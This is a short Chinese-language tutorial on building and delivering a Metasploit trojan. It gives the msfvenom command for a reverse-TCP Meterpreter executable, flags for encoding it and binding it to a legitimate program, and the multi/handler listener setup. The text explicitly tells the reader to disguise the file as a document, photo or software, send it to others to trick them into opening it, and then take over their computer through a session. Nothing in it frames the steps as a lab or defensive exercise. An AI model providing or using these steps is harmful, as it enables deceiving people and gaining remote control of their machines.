1.使用msf生成小马文件:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<本地端口> -f exe -o hacker.exe
参数
-p payloads
-f 输出格式
-o 输入地址
-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)
-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe)
2.将文件放在目标主机上,主要利用钓鱼的思想(执行命令:(linux上运行需要)chmod 777 hacker.exe (给予权限))
3.
msfconsole (运行msfconsole)
use exploit/multi/handler (选择模块)
set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号
exploit -z -j (后台执行)
4.这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)
发给别人后,在目标机器上等待别人打开hacker.exe,打开即上钩了
5.sessions(查看用户)
sessions -i 1 (选择用户1)
进入目标电脑,获得权限